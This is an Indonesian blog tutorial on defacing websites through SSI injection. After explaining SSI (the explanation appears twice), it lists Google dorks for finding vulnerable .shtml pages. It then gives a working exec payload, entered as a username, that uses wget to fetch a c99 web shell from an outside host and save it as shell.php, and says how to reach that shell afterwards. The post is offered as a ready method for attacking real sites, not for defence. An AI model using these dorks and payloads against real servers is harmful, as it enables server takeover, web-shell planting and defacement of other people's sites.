Tutorial Deface Dengan Cara Server Side Include Injection (SSI Injection)
Dan hari ini gw ingin share POC Deface Dengan Cara Server Side Include Injection (SSI Injection)
Lalu apa itu SSI Injection
Gw jelasin sedikit apa itu SSI Injection
Server Side Includes (SSI) adalah bahasa server untuk halaman web, yang dirancang untuk membuat halaman HTML statis sedikit lebih dinamis.
SSI bermaksud membuat halaman HTML mirip dengan aplikasi dinamis, seperti yang ditulis dalam ASP, PHP dan bahasa yang serupa dan memungkinkan penyertaan server informasi dinamis di halaman HTML. Halaman HTML dengan tag SSI biasanya memiliki ekstensi shtml atau shtm.
Penggunaan SSI yang paling umum adalah termasuk konten file ke dalam halaman web dari server web.
Lalu apa itu SSI Injection
Gw jelasin sedikit apa itu SSI Injection
Server Side Includes (SSI) adalah bahasa server untuk halaman web, yang dirancang untuk membuat halaman HTML statis sedikit lebih dinamis.
SSI bermaksud membuat halaman HTML mirip dengan aplikasi dinamis, seperti yang ditulis dalam ASP, PHP dan bahasa yang serupa dan memungkinkan penyertaan server informasi dinamis di halaman HTML. Halaman HTML dengan tag SSI biasanya memiliki ekstensi shtml atau shtm.
Penggunaan SSI yang paling umum adalah termasuk konten file ke dalam halaman web dari server web.
DORK
inurl:bin/Cklb/ - Best Dork
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=
Gw menemukan halaman ini dan memasukkan nama pengguna gw sebagai Sylar:
Kita dapat melihat pada gambar di atas bahwa nama pengguna yang kita masukkan telah ditampilkan di layar setelah kami mengirim data dan halaman dengan ekstensi shtml, jadi menurut lo apa yang akan terjadi jika gw memasukkan nama pengguna gw sebagai:
<!--#echo var="HTTP_USER_AGENT" -->
Lalu akan muncul ini
Sekarang gw akan mencoba memasukkan kode berikut sebagai nama pengguna:
<!--#exec cmd="wget http://www.sh3ll.org/c99.txt? -O shell.php" -->
Kalau berhasil akan muncul seprti ini
The command executed successfully
Sekarang kita lihat shell kita
akses shellnya? site.com/shell.php
Ok cukup mudah bukan? XD
Ok guys cukup sekian, soalnya admin mau lebaran dulu sama teman teman, keluarga dll nya :)
Postingan Lebih Baru
Postingan Lebih Baru
Postingan Lama
Postingan Lama